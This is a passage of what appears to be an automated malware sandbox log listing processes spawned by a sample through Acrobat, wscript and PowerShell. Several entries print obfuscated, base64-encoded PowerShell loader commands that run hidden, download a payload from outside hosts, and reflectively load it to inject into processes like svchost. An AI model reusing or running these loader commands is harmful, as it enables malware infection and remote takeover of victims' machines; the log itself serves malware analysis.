([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex" |
|
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
|
